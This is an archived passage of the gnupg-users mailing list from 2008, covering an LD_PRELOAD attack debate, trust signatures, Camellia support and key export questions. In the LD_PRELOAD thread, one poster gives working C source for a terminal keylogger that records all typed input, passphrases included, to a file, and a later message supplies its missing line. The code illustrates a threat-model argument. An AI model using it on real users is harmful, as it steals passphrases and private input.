wouldn't change the fact that the lib gets loaded anyway. > An LD_PRELOADed lib wouldn't have a chance to get hooked. Well, even if the env-var isn't there, it still get's loaded! Alex. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQCVAwUBSFBEBRYlVVSQ3uFxAQLSagP+ONzt6GC+AVlgudwb+Agx6JeKKLC9teg8 cOPSRlDBXTWvH5qZakEOEy+9is6ALWRUA4N5soYiKnra1v9FiEDVqfFxqhsa2V5P 4TE/g+FxuR744zYAbJspJHH5zxxaSX35+epzTJ5I6+zmxLvWLFL+Eed9fmE5ljW/ kr0AjDcNKMI= =Jbu1 -----END PGP SIGNATURE----- From dshaw at jabberwocky.com Thu Jun 12 01:02:00 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Wed, 11 Jun 2008 19:02:00 -0400 Subject: LD_PRELOAD attack In-Reply-To: <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <20080611195627.GA4876@jabberwocky.com> <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> Message-ID: <20080611230200.GA5042@jabberwocky.com> On Wed, Jun 11, 2008 at 04:31:45PM -0400, michael graffam wrote: > On Wed, Jun 11, 2008 at 3:56 PM, David Shaw wrote: > > > If the attacker had access to your machine to implement the LD_PRELOAD > > attack, there are literally dozens of ways they can similarly steal > > whatever data they are trying to steal. Why do a very complex attack > > involving replacing libraries when they could just replace the GPG > > binary itself? > > > Replacing the GPG bin requires root. An LD_PRELOAD'ed lib doesn't. Try it. I don't have to replace it for everyone - just you, and if I can write to your computer, I can make you run any binary I want. Remember, you own your own shell .rc file. > Or add a shell script named 'gpg' and put it in your > > search path ahead of the real gpg? > > > Again, root. Again, .bashrc. > > Or turn on typescript by default. > > > Doesn't save GPG passphrases. Why would I care about getting your passphrase if I can get everything you typed into the message before it was encrypted? Still, just for laughs, here's a hack that will save everything typed on a particular terminal, including passphrases (real error checking and proper handling of sigchld left up to the reader): #include #include #include #include #include #include #include int main(int argc,char *argv[]) { int master,slave,snoop; pid_t pid; char byte; snoop=open("/tmp/snoop",O_WRONLY|O_CREAT|O_TRUNC,0666); pid=fork(); if(pid) { struct termios term; tcgetattr(0,&term); cfmakeraw(&term); term.c_lflag&=~ECHO; tcsetattr(0,TCSAFLUSH,&term); close(slave); for(;;) { if(read(0,&byte,1)==1) { write(master,&byte,1); write(snoop,&byte,1); } } } else { pid=fork(); if(pid) { close(slave); for(;;) { if(read(master,&byte,1)==1) write(1,&byte,1); } } else { setsid(); close(master); dup2(slave,0); dup2(slave,1); dup2(slave,2); close(slave); execl("/bin/bash","/bin/bash","-i",NULL); } } return 0; } > > Or load a kernel module that changes the meaning of system calls. Or > > replace the rng with one that isn't random. Or, or, or. > > > Root, root, root. Do you seriously think that someone who can write to your user-level account can't get root pretty soon? This can be as complex as reading bugtraq for a while until a buffer overrun comes along, or as simple as arranging for "su" to go somewhere else. > Get it yet? LD_PRELOAD enables attacks against GPG w/o requiring full access > to the box. The attacker just need access to the user's account. I do get it. I'm not convinced that you do. If an attacker has access to the user's account, it's game over. At that point, it's just a question which particular method the attacker will choose to completely own you. David From george.davidescu at gmail.com Thu Jun 12 01:10:28 2008 From: george.davidescu at gmail.com (bezna) Date: Wed, 11 Jun 2008 16:10:28 -0700 (PDT) Subject: Questions about trust signatures Message-ID: <17789248.post@talk.nabble.com> Dear GnuPG users, I have some questions regarding use of the tsign command; please don't feel you have to answer all of them at once, just one will do, although I'd like to point out that the one most important to me is #1. I?ve been doing some reading and experimentation with tsign and I think I have a handle on how the mechanics of it work. A brief aside: David Shaw posted a message (http://lists.gnupg.org/pipermail/gnupg-users/2005-May/025612.html ) providing a link to an article which apparently explained trust signature concepts well ( http://download.cryptoex.com/documents/whitepaper/cex2003-pgp-in-unternehmen-en/Tech%20White%20Paper%202002%20-%20Using%20OpenPGP%20in%20Corporations.pdf ). However, the link appears to be down and searches for the article have turned up nothing. Does anyone (perhaps David himself) have a copy of it, or know where I can obtain it? Thanks in advance; now, my questions: 1) My first question revolves around its application in a real-life scenario. Suppose we have a strictly hierarchical environment, where the validation of certificates depends solely on CAs. In such a scenario, would the users perform trust signatures of a certain level on the CAs, who would then perform trust signatures on CAs lower in the hierarchy (and thus lower in power, since with each link in the trust signature chain the ?trust power? represented by the depth allotted to the tsig diminishes until it reaches 1, the terminal value, beyond which the trust chain cannot be extended through empowering other users with tsigs). Consider the following example: User 1 ? tsig of depth 2 --> Root CA ? tsig of depth 1 --> Subordinate CA ? regular signature --> User 2 Thus, through this chain of trust, User 2?s certificate appears valid to User 1. A similar chain could be traced from User 2 to User 1, or between any other two users in the organization, using the Root CA as a hub for trust signatures; alternatively, only the subordinate CA could be the trusted entity by the users, in the case where that CA is responsible for a department and users don?t care about the validity of all the certificates of users outside their own branch in the organization. So my first question is, have I understood the use of this command in a real-world environment correctly? Are there other ways in which it could be applied? Can it be applied in a non-hierarchical context? What I mean by this is, is there some way to get rid of this ?depth? functionality and to be able to propagate trust continuously and indefinitely down a chain of users, without having it diminish until it reaches an endpoint? For example ( --> denotes a signature, ==> denotes trust) : A ==> B ==> C ==> D --> E Through this chain of trust, Eve?s certificate appears valid to Alice. The implementation of this example using GPG trust signatures would involve using descending orders (the ?depth? parameter) of trust signatures with each hop: A =3=> B =2=> C =1=> D --> E Obviously this ?depth? parameter is better suited to the CA example outlined earlier; it might not be possible for Alice (or any other user in the chain) to know how many hops away Eve is, and what depth to tsign Bob with so that she will validate Eve?s certificate. Furthermore, if Bob tsigned Carmen with a depth of 4 (for his own purposes), the chain of trust linking Eve to Alice would be broken since GPG computes certificate validity (and trust in the case of tsigns) only down paths where each next node in the path was tsigned with a lower ?depth? than the ?depth? of the tsign on the node before it. Is there some way to circumvent this in GPG, short of writing your own code? Does the PGP Corporation?s program offer any alternatives? That was the main question I wanted to address. Now, here are some other issues I have with tsign: 2) I noticed that when two disjoint, continuous (not broken by a tsign assigning only ?marginal? trust somewhere) paths of tsigns of the same length lead to the same certificate at the end of the path, the signature which was last made is taken into computing that terminal certificate?s trust rating, rather than some other criteria. This is hard to explain without an example, so here it is: Root CA 1 --> CA 1 / \ A B --> C \ / Root CA 2 --> CA 2 Bob's certificate has been validated in two companies he works for. Alice wishes to find the validity of Charlotte's certificate, who was signed by Bob. She has tsigned the Root CAs of both companies (with a depth of 3 for the sake of the example). Now, the subaltern CA (tsigned with a depth of 2) of Company 1 has tsigned Bob (with a depth of 1) and specified that he was fully trustworthy when it came to validating certificates. The subaltern CA of Company 2 though, had also tsigned Bob but according to him Bob is only marginally trustworthy. According to the current GPG implementation, CA2's signature which is the most recent would be used in determining Bob's ownertrust in Alice's trust database! Consequently Charlotte's certificate would appear marginally valid. This to me seems flawed. If CA1's signature was made before CA2's (assume CA1 is a procrastinator), then Bob would appear as fully trustworthy to Alice and Charlotte would be validated. The fact that Bob's trustworthyness to Alice hinges on which CA got his signature in last seems like a bad approach to me. 3) What's the point of masking any depth of a tsign greater than 9 with a T? >From what I've seen, a level 11 signature is still different from a level 12 signature and so on. Signatures beyond the threshold of 9 aren't discretized into the same class. 4) What do the "12x" and "13x" mean in the following --with-colones --list-sigs output? sig:::17:2E62D2D5026D69FA:2008-06-11::6 120::David:13x: sig:::17:1816F82A9DE5372F:2008-06-11::1 60::Larry:12x: 5) As in question 2, I noticed that if there are two disjoint paths of tsigns that lead to the same certificate and one path is shorter (suppose Root CA 2 signed Bob's certificate directly), the shorter path is preferred over the longer one. Are there any other rules for determining which path of tsigns is used, using criteria such as the level of certitude in the signature (3 for "checked very carefully", 2 for "checked casually", or 1 [or 0]), the depth of the signature, and so on? The only other "rule" I seemed to find was the one mentioned in question 2, with the newest trust signature winning over the older ones. That's all for now. Thanks for reading. Please note that Question 1 is my priority, so please don't feel you have to answer all the questions or all of them at once. Thank you, George -- View this message in context: http://www.nabble.com/Questions-about-trust-signatures-tp17789248p17789248.html Sent from the GnuPG - User mailing list archive at Nabble.com. From faramir.cl at gmail.com Thu Jun 12 02:11:36 2008 From: faramir.cl at gmail.com (Faramir) Date: Wed, 11 Jun 2008 20:11:36 -0400 Subject: LD_PRELOAD attack In-Reply-To: <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <20080611195627.GA4876@jabberwocky.com> <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> Message-ID: <485069B8.1040708@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 michael graffam escribi?: >> Or turn on typescript by default. > > > Doesn't save GPG passphrases. Is typescrit some sort of keylogger? If it is, I don't see any reason why a keylogger can't catch the gpg passphrase (warning: there may be a very good reason for that, it is me the one that doesn't see it). > Or load a kernel module that changes the meaning of system calls. Or > replace the rng with one that isn't random. Or, or, or. > > > Root, root, root. Am I right when I think root is like "admin" in windows (not exactly the same, but the same idea?) Is LD_PRELOAD a concern for windows users? (I figure it is, since, as far as I understood, the reason so use LD_PRELOAD is for portability of code) >> Having GPG do some extra checks doesn't >> really help, because the attacker can simply arrange for these extra >> checks to appear to succeed, or just replace GPG altogether so they >> don't run. But maybe it would help if GPG was not in the computer when the attacker had access to it. But anyway, maybe there is a lot of other nasty things that can be crawling in the computer, if somebody had access to it... > Sure, its true.. and if your threat model includes shotgun-carrying > assailants or hostile root users, its entirely valid. In fact, there is no need of shotguns, my house door was broken by the simple method of kicking it near the lock. The door itself resisted, but the countersheet got broken (after many translation attempts, I am not sure if I got the right word for the broken thing). But what do I mean? Maybe there are a simple way to solve the "locked door" problem. It is just that since we are not the kind of people that use to break through locked doors, we don't those ways to do it. > But what about just some basic hygiene to keep honest people honest? > Hell, thats what most REAL locks are for, anyhow. I think we use locks to discourage dishonest people from trying to break in... we know we can't really prevent an attack, but the more hard it is for them to succeed, it becomes less likely they will attempt an attack. So, if there is a way to increase security, I, as end user, would welcome it. But we need to always keep in mind security is never absolute. The only secure computer, is the one stored inside a safe. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJIUGm4AAoJEMV4f6PvczxAjmAH/iID4pf9c9JGWEculIZbmNCL OFORj8ikyY3HmyPQQiRXB076GlpV08rj3ZYTYLs0813SdgwIdqKAxUS2Qje8X7sT DN6seZR3Cv31kHrvEaM90Gssaxg6mzRPnhVCV8GIYDT53j5RA+EzmKoDavOrtSaN eqLwHOPhkSiH7lZc1pz5k6AJDX68wC3q23iK42H4hU9moMe/q09TnAqHO62QnUyX r3G7yc4nem8adSHp5gQvpxnoUi6Fm+rahwSASsiQv46GNZy6WarHtWTg0dikbDkI IMQdytCqAAI7dxzfRif9BPmDFB+/A0WQO2F6tYIXLjUOKBVtjzyO9E4otAX9T0A= =8YF3 -----END PGP SIGNATURE----- From dshaw at jabberwocky.com Thu Jun 12 02:57:44 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Wed, 11 Jun 2008 20:57:44 -0400 Subject: LD_PRELOAD attack In-Reply-To: <485069B8.1040708@gmail.com> References: <3e86b22c0806110743q6e59aaa2j8c442830201418d0@mail.gmail.com> <20080611195627.GA4876@jabberwocky.com> <3e86b22c0806111331y442910a2i5cf4078b140c8e07@mail.gmail.com> <485069B8.1040708@gmail.com> Message-ID: <20080612005744.GA599@jabberwocky.com> On Wed, Jun 11, 2008 at 08:11:36PM -0400, Faramir wrote: > michael graffam escribi?: > > >> Or turn on typescript by default. > > > > > > Doesn't save GPG passphrases. > > Is typescrit some sort of keylogger? If it is, I don't see any reason > why a keylogger can't catch the gpg passphrase (warning: there may be a > very good reason for that, it is me the one that doesn't see it). Typescript is sort of an output keylogger. It's mainly used to produce a "script" of a session. It's true that it doesn't record passphrases, but you can write a program that does the same thing. Note, I left out a line of code in the previous example if anyone wants to try it: openpty(&master,&slave,NULL,NULL,NULL); > So, if there is a way to increase security, I, as end user, would > welcome it. But we need to always keep in mind security is never > absolute. The only secure computer, is the one stored inside a safe. Defending against LD_PRELOAD doesn't actually make GPG safer overall. It just makes it more complex. Incidentally, there is a really easy way to "defend" against LD_PRELOAD in GPG: just make it setuid root. GPG is smart enough to see it is setuid root and drop the root privs early, and most dynamic linkers automatically disable LD_PRELOAD for setuid binaries. David From dshaw at jabberwocky.com Thu Jun 12 03:06:54 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Wed, 11 Jun 2008 21:06:54 -0400 Subject: public key different between keyserver and exported file In-Reply-To: <485029A9.8010106@rickv.com> References: <485029A9.8010106@rickv.com> Message-ID: On Jun 11, 2008, at 3:38 PM, Rick Valenzuela wrote: > > I just created a new primary key and subkeys, and uploaded them to > keyservers. Then I exported my public key in ascii-armor, and copied > that file to my website. I noticed that the very last few characters > were different from what the keyservers had. Each version begins the > same, but somewhere they end up different. Did I mess something up? > Should I be worried about this? Nothing to worry about. OpenPGP packets can be written in multiple different ways, even though they come out to the same thing in actual usage. You're just seeing a "re-formatting" of your key. David From rick at rickv.com Thu Jun 12 03:20:03 2008 From: rick at rickv.com (Rick Valenzuela) Date: Wed, 11 Jun 2008 21:20:03 -0400 Subject: public key different between keyserver and exported file In-Reply-To: References: <485029A9.8010106@rickv.com> Message-ID: <485079C3.1000706@rickv.com> Oh, okay. Thank you for clearing that up; I tried searching and found nothing close to addressing this. Rick -- Rick Valenzuela photographer | reporter +1 267 694 3642 | www.rickv.com David Shaw wrote: > On Jun 11, 2008, at 3:38 PM, Rick Valenzuela wrote: >> >> I just created a new primary key and subkeys, and uploaded them to >> keyservers. Then I exported my public key in ascii-armor, and copied >> that file to my website. I noticed that the very last few characters >> were different from what the keyservers had. Each version begins the >> same, but somewhere they end up different. Did I mess something up? >> Should I be worried about this? > > Nothing to worry about. OpenPGP packets can be written in multiple > different ways, even though they come out to the same thing in actual > usage. You're just seeing a "re-formatting" of your key. > > David > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users From sdwyer at spykes.id.au Thu Jun 12 06:18:46 2008 From: sdwyer at spykes.id.au (Simon Dwyer) Date: Thu, 12 Jun 2008 14:18:46 +1000 Subject: Confused about Sub keys. In-Reply-To: <529e76830806111324y244a4567k6dad886af334961f@mail.gmail.com> References: <1213062867.12670.11.camel@tsg001.mulawa.internal> <529e76830806111324y244a4567k6dad886af334961f@mail.gmail.com> Message-ID: <1213244326.5159.0.camel@tsg001.mulawa.internal> Was this a joke or was i ment to acutally take something from that? ... or was it never leave your subkeys laying around? :P On Wed, 2008-06-11 at 16:24 -0400, Scott Lambdin wrote: > Good example of why you need subkeys. > > http://www.wsbtv.com/news/15847652/detail.html > > > On 6/9/08, Simon Dwyer wrote: > Hi everyone, > > I am new to all this and have been alot of reading. > > One thing i cant get my head around is subkeys. I have > generated a sub > key with my master key and i undestand that. All the commands > and thing > i have been doing i have been using my master keys id... > should i be > actively using my sub key? or does it just use it as i talk to > people? > > Cheers, > > Simon Dwyer > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > > > > > > -- > CILCIL > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users From aongenae at gmail.com Thu Jun 12 09:41:12 2008 From: aongenae at gmail.com (Arnaud Ongenae) Date: Thu, 12 Jun 2008 09:41:12 +0200 Subject: Encrypting files for many users.. In-Reply-To: References: Message-ID: <83713a650806120041j436f95a4pfa5704930cd45ad5@mail.gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 OpenPGP is a protocol essentially oriented to the exchange of information. But can also be used to protect file on your own computer. You can encrpyt one file for many users, it is usually the case when you encrypt one message: example: Alice want to send a message 'm' to Bob Alice encrypt his message 'm' with both her key and Bob's key E_{a, b}(m) By doing this Alice can read her own message later. Bod will decrypt it with his private key D_b(E{a, b} So to come back to your problem, do you want to exchange data ? if so, you can encrypt this data to all the person you want with their public key... And when an user is added or remove, you simply encrypt the new message with or without his public key... But if you plan to share some space with encrypted files, and you want people to be added or removed to this sharing, you must re-encrypt the files with all the current keys wich I thing is a bit annoying if you have a lot of persons who can access the sharing and a lot of files... Another important point is that each accessing person must have a public/privat key... Your big problem is 'remove' people, cannot those people access data there were allowed in the past an only be restricted to the new files ? it could considerably simplify thing ! _-Arnaud-_ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: http://getfiregpg.org iQEcBAEBAgAGBQJIUNL3AAoJEFgy9SDyxO8hFPUH/31wa/G+Kw5Lpw8Of0KDzgpo wbXerhdk5EaaU1Ig4OBqwivzvkSRERS8QwD0LhpQe7qG4sQGLeolrJkXa1wVrcBy OsQts6HVDh0Lg3VqOK+orUyiURKKifdUVxXN+UYa7YtaJ17N/NOzkSqcl7yKd2cI 1ReXY0q78DJ80PnY4rw5WTtq93EzyTc9cnoRZWy6n6G6iGCMUrscgOMLYvSNNy5W tpYwOs4njAMNHoUr0t+MoUqEGijS/Mpa4YLfEQ0TI4Vle+G5DFZzXr9egExnIKR6 fDETqGOPL9uugg96WnzRG9Y7xe0uoAJFNggjp/14sTkscFoagqVuJZ8Dk6apJfc= =fGuH -----END PGP SIGNATURE----- On Wed, Jun 11, 2008 at 7:13 PM, Sartoros Dionysios wrote: > > > Hey, > > Question for you guys, new gnupg user here, great software.. > > I was thinking of maybe encrypting files in PGP that many people will > require access to, since i dont know PGP inside and out I was wondering > what would be the best method, as sometimes I will have to remove access > for some users and add new users > > I dont know subkeys or how pgp works with files too well.. Can i > add/remove users' keys to encrypted files.. If i have 100 or even 1000 > files, would I have to do it one by one (to add a new user or remove > access to one).. > > Thanks > Dennis > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > From wk at gnupg.org Thu Jun 12 09:48:50 2008 From: wk at gnupg.org (Werner Koch) Date: Thu, 12 Jun 2008 09:48:50 +0200 Subject: Signing in RFC3156 PGP/MIME format In-Reply-To: <5c06fa770806111246u678913fatf7af38a3d55a87ae@mail.gmail.com> (Deron Meranda's message of "Wed, 11 Jun 2008 15:46:51 -0400") References: <5c06fa770806111246u678913fatf7af38a3d55a87ae@mail.gmail.com> Message-ID: <877icvnlel.fsf@wheatstone.g10code.de> On Wed, 11 Jun 2008 21:46, deron.meranda at gmail.com said: > gpg2 --rfc4880 --armor --sign testdoc.part Use gpg2 --rfc4880 --armor --detach-sign testdoc.part That is because PGP/MIME as well as S/MIME use detached sigtnatures. It allows to read the content without a need for a tool to extract/verify the content form a OpenPGP signature message. Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From laurent.jumet at skynet.be Thu Jun 12 11:01:24 2008 From: laurent.jumet at skynet.be (Laurent Jumet) Date: Thu, 12 Jun 2008 11:01:24 +0200 Subject: CAMELLIA Message-ID: Hello ! Is CAMELLIA implemented in 1.4.9 or should we install a plug-in like IDEA.DLL ? -- Laurent Jumet KeyID: 0xCFAF704C From wk at gnupg.org Thu Jun 12 12:11:55 2008 From: wk at gnupg.org (Werner Koch) Date: Thu, 12 Jun 2008 12:11:55 +0200 Subject: CAMELLIA In-Reply-To: (Laurent Jumet's message of "Thu, 12 Jun 2008 11:01:24 +0200") References: Message-ID: <874p7zm07o.fsf@wheatstone.g10code.de> On Thu, 12 Jun 2008 11:01, laurent.jumet at skynet.be said: > Is CAMELLIA implemented in 1.4.9 or should we install a plug-in like IDEA.DLL ? Camellia is not yet defined by OpenPGP and thus you can't use it. There is a testing only option to enable it. However using it now would create incomatible message because the used OpenPGP algorithm ID for Camellia is preliminary and may change in the future. In fact it already changed in the past and it may change again. Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From jmoore3rd at bellsouth.net Thu Jun 12 13:42:19 2008 From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Thu, 12 Jun 2008 07:42:19 -0400 Subject: CAMELLIA In-Reply-To: References: Message-ID: <48510B9B.7040803@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Laurent Jumet wrote: > Hello ! > > Is CAMELLIA implemented in 1.4.9 or should we install a plug-in like IDEA.DLL ? "Implemented" = Yes; in that it is present but Camellia is *not* Enabled by default. In order to Enable Camellia You will need to Build GnuPG with the --enable-camellia Flag in place. Before You rush to do this however I think You should re-read the Cautionary Message from David Shaw regarding the advisability of this: **************************************************************************** Some people have noticed that I recently committed support for the Camellia cipher in GnuPG. Here's the story behind that. Camellia is not currently part of OpenPGP, and will also not be part of the upcoming "2440bis" updating of RFC-2440. It has been proposed, however, that right after 2440bis is published, the OpenPGP Working Group take the necessary steps to add Camellia. To simplify interoperability testing between different OpenPGP implementations, I've added Camellia to GnuPG. Naturally, it is disabled by default and the only people who should really enable it are those doing interoperability work. While it is impossible for me to stop people from enabling and using it, be warned of a few things: first, Camellia isn't part of OpenPGP yet, and if for whatever reason it doesn't become part of OpenPGP, you won't be able to decrypt anything you've encrypted with Camellia. Similarly, as Camellia has not been assigned an OpenPGP cipher number, I've picked 11 (the next unassigned number). If Camellia gets approved with a different number, you won't be able to decrypt anything you've encrypted with this version of Camellia. Finally, if there is some error in the current GnuPG usage of Camellia that we later fix, you again won't be able to decrypt. I'm not going to go into whether Camellia is considered strong or not, as it's not really relevant to this discussion: even if Camellia was the strongest cipher in the world, you should still not enable it for the reasons given above. Rest assured that if/when Camellia is approved (or even on a reasonable track to approval), it will be enabled for general use. David ****************************************************************************** I "re-printed" this here to refresh the memories of folks who may have missed/forgotten David's original comments on Camellia. 33 JOHN ;) Timestamp: Thursday 12 Jun 2008, 07:41 --400 (Eastern Daylight Time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.5.0-svn4754: (MingW32) Comment: Public Key at: http://tinyurl.com/8cpho Comment: Gossamer Spider Web of Trust: https://www.gswot.org Comment: Homepage: http://tinyurl.com/yzhbhx iQEcBAEBCgAGBQJIUQuZAAoJEBCGy9eAtCsPrkwIAKeFHntAmngQwW+S5oOxKO6t Gd5ocuzNPjdcy3QZPrMPoSxR/K/V7bY0w2bP5M+NnMc9oy24fS1FiGYGVrscUCJY /V0jMBvRwRb/ouIn57HefV6gVOtjVQ4UtWv2AIRIbn9WnnT21qGc13QVUNYlT6Xv Rg9iPryYD/Ib/NcJYJ4SKy0evNezPxILtmrzlVR6k5KtCPDFIzj/0Jb3UhUqNbDc 54WAXzubz2sfYJRSwlnkN26xuqrS8PMGmoYxbfKpn3zAWh9ZprXwjjJPjPumkgKx qZiClAooJbOT5nZ6l3qvmR7XFUb/JUasypIBLVzNBO8UBZVjWzIspuqW9k5n1KM= =1n4n -----END PGP SIGNATURE----- From jmoore3rd at bellsouth.net Thu Jun 12 14:03:32 2008 From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Thu, 12 Jun 2008 08:03:32 -0400 Subject: [patch] remove unused variable In-Reply-To: <200806121223.18606.petr.uzel@suse.cz> References: <200806111351.54449.petr.uzel@suse.cz> <87skvkotd9.fsf@wheatstone.g10code.de> <200806121223.18606.petr.uzel@suse.cz> Message-ID: <48511094.20906@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Petr Uzel wrote: > Dne Wednesday 11 of June 2008 17:59:14 Werner Koch napsal(a): >> Please do not post longer patches or series of patches unless you have >> signed a copyright assignment with the FSF. > > OK, sorry, I had no idea that this is required. I did some googling but I was > not able to find clear instructions how to sign such agreement - can I ask > you for more info how to do this? Being good friends with the Legal Affairs Officer for FSFEurope I happen to have the Links You desire handy: http://www.gnu.org/prep/maintain/html_node/Copyright-Papers.html http://git.savannah.gnu.org/gitweb/?p=gnulib.git;a=tree;f=doc/Copyright;h=c4ef7f86c8f2b745669e3b36086e8d82421ec17f;hb=HEAD HTH JOHN ;) Timestamp: Thursday 12 Jun 2008, 08:02 --400 (Eastern Daylight Time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.5.0-svn4754: (MingW32) Comment: Public Key at: http://tinyurl.com/8cpho Comment: Gossamer Spider Web of Trust: https://www.gswot.org Comment: Homepage: http://tinyurl.com/yzhbhx iQEcBAEBCgAGBQJIURCRAAoJEBCGy9eAtCsPC6gH/27QrjbT7GoLktU9RJ3XFmwe 76UJw5MY1ISt36QwSNTf2Tar/3iswc5d/jBw02ha+kuRnabN+73B2MdBUsJpC+rw lMpiCyDbgNi3tCbtZxAcaG804OA0T5qwueggwDmza8OO4wH2ivilF3xDLEpg2lHN 2Sj0EECD00E//ND50mGqkQr40lz77Qzx0lDIglYrT6Y+yHmKPl/7/QZr/lmgtErz IFmVJd2c1jRhfO1uhCDHcj8pUYAeb5qiU5bcjzwX5Y/x3igy7yB/NYhjgRO9rZKV I7lU4hw6X7gzsTV+u092y6HZHqh9HYBsmaeq2dURtIBga8F39pO3YNW+/9JWqrk= =bQ2Z -----END PGP SIGNATURE----- From vedaal at hush.com Thu Jun 12 16:39:22 2008 From: vedaal at hush.com (vedaal at hush.com) Date: Thu, 12 Jun 2008 10:39:22 -0400 Subject: Camellia Message-ID: <20080612143926.1F21B118040@mailserver5.hushmail.com> >Message: 9 >Date: Thu, 12 Jun 2008 07:42:19 -0400 >From: "John W. Moore III" >Subject: Re: CAMELLIA >as Camellia has not been assigned an OpenPGP cipher >number, >I've picked 11 (the next unassigned number). If Camellia gets >approved with a different number, you won't be able to decrypt >anything you've encrypted with this version of Camellia. how hard would it be to write a patch for an option of --try-all-symmetrics or --use-symmetric-name that would ignore the cipher number and try all of them, or try only the one specified ? ( disclaimer: *not* a feature request for the gnupg team :-) only a workaround thought for the hackers who choose to enable Camellia now ) vedaal any ads or links below this message are added by hushmail without my endorsement or awareness of the nature of the link -- Click now and invest wisely with these mutual fund resources! http://tagline.hushmail.com/fc/Ioyw6h4et1fvUjVhrtGuh7eRe0JAVPVpuzeWgkdmUlSYzdXky4bmcn/ From ivan.peev at gmail.com Tue Jun 10 05:46:28 2008 From: ivan.peev at gmail.com (Ivan Peev) Date: Mon, 9 Jun 2008 23:46:28 -0400 Subject: Remove public key from secret key Message-ID: Hello Guys, Is there a way to export the secret key without the public key or remove the public key from exported secret key? I'm trying the following scenario: 1. Encrypt data with particular public key on one machine. 2. Decrypt data with related secret key on another machine. Basically I don't want someone to be able to generate data, which can be decrypted with the related secret key. Thank you for your time. Regards, Ivan -------------- next part -------------- An HTML attachment was scrubbed... URL: From Dionysios.Sartoros at SPCUM.QC.CA Tue Jun 10 20:37:53 2008 From: Dionysios.Sartoros at SPCUM.QC.CA (Sartoros Dionysios) Date: Tue, 10 Jun 2008 14:37:53 -0400 Subject: Encrypting files for many users.. Message-ID: Hey, Question for you guys, new gnupg user here, great software.. I was thinking of maybe encrypting files in PGP that many people will require access to, since i dont know PGP inside and out I was wondering what would be the best method, as sometimes I will have to remove access for some users and add new users I dont know subkeys or how pgp works with files too well.. Can i add/remove users' keys to encrypted files.. If i have 100 or even 1000 files, would I have to do it one by one (to add a new user or remove access to one).. Thanks Dennis From slashdog at gmail.com Wed Jun 11 05:24:42 2008 From: slashdog at gmail.com (stet) Date: Tue, 10 Jun 2008 20:24:42 -0700 (PDT) Subject: different exported and uploaded public key Message-ID: <17769233.post@talk.nabble.com> I just created a new primary key and subkeys, and uploaded them to keyservers. Then I exported my public key in ascii-armor, and copied that file to a web forum profile. I noticed that the very last few characters were different from from what the keyservers said. How does that happen? Any help would be appreciated. At the top of this link is my uploaded public key: http://keyserver.gingerbear.net:11371/pks/lookup?search=rick+valenzuela&fingerprint=on&op=index It is also different at pgp.mit.edu, and at http://sks-keyservers.net/status/ Below is my public key as exported to an ascii file: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.8 (Darwin) mQINBEhPIc4BEADX1MijX9229AklTKdCGDc4vu7qsgrjnwp0sqszP1wBsETHOc2O P1IuSZXhw4ks0aoO5dp02GH7P6l/8p7ChzXDqd7cyX8FCtsJwhxEereiuSG7e9mO TiKTZ2IhxVk7w7RAWmUHgeH/29GnvIZcQdhE2gFksKg8qYYS4UerHw4BQv3dlVub JodZ5rjI2CNdMgKKP0Nny+GRh6sdAtoQ8oit6HRLCWIGeIJf8JRn9Un+zOxCw5BW LMPibtvBroUWOR5ly8X4zgc1cMEabUWnAxbMgYau5l5xAWEcrEDm//SGhIjReGuI FgabsNTPgnRJCENe11bvLhRYbTmjYCSOz5kiaIZbnCderMttMCXgXoqBed1rvlKV 9usRxZ5cwyzlgkYycr6EMFWy9pPGnsuLOlFwam+gZlczg5pDnXw7fMcMf8xuMJJ/ NCO+ZhKh0zZFJ41isQU3/UR12W6s0v/g0cWPU0RwHJs3svu5HtbSKiszK0Ar16F1 Gsas90JAOklNg3yZU3p7N7GU4wg1L0HN6uh9kinaBjCyjU4WTI9r34NZc0MG1Iel TFbtCAGmDWSkECj7x6MAt5NC4L3mN+ar55pkBbcodgkNvscxR24T1bYMeN5CF8Il 0oc0/2wrRH/CAUcYQSUSNq/DzdIWi/5bE2hfaRALpzBbvJrXrlKeIa7n2QARAQAB tDJSaWNrIFZhbGVuenVlbGEgKHBob3Rvam91cm5hbGlzdCkgPHJpY2tAcmlja3Yu Y29tPokCNgQTAQIAIAUCSE8hzgIbAwYLCQgHAwIEFQIIAwQWAgMBAh4BAheAAAoJ EAVBJK3VZEApXycP/3euVLsDRo1fqetv+ow7iljfBeV/sNwG1rlKAEsU+aA3DaCR 